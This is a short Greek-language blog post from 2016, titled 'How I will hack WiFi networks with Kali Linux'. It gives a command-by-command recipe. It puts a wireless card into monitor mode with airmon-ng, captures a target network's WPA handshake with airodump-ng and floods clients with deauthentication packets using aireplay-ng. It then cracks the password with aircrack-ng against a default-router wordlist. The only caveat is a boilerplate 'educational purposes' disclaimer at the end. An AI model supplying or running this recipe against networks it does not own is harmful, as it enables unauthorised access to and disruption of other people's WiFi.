Κυριακή, 20 Νοεμβρίου 2016

ΠΩΣ ΘΑ ΧΑΚΑΡΩ ΔΙΚΤΥΑ WIFI ΜΕ ΤΟ KALI LINUX


1. Ανοίγουμε τερματικό (σαν root)


#  airmon-ng start wlan0 


σε κάποιες περιπτώσεις μπορεί να μην αναγνωρίζει το chipset σας τότε δίνεται


# airmon-ng start wlan0mon

2. Για την λίστα δικτύων δίνουμε


airodump-ng wlan0mon
3. Αφού διαλέξουμε το δίκτυο που μας ενδιαφέρει τότε δίνουμε


# airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon


στην δική μας είναι


#  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon  άμα δεν σας δίνει πίσω handshake ανοίξτε ένα άλλο τερματικό δώστε


# aireplay-ng -0 0 -a <bssid> mon0


που στην δική μας περίπτωση είναι


# aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon


 


 και τέλος χρησιμοποιούμε την word list του Kali Linux που περιέχει κωδικούς απο όλα τα εργοστασιακά routers/modems και πολλά άλλα


# aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.capκαλή επιτυχία 
IF YOU BREAK ANY OF YOUR DEVICES IN ANY WAY, CAUSE THE END OF THE WORLD, GET ARRESTED, OR NERD RAGE ON YOUR FAMILY, I AM NOT RESPONSIBLE.
I AM NOT RESPONSIBLE FOR HOW YOU USE ANY INFORMATION CONTAINED HEREIN, IT IS INTENDED FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY. IT IS SOLELY YOUR RESPONSIBILITY TO UNDERSTAND AND FOLLOW LOCAL, AND INTERNATIONAL LAWS. DO NOT INTERACT WITH ANY SIGNAL BUT YOUR OWN!airmon-ng
airmon-ng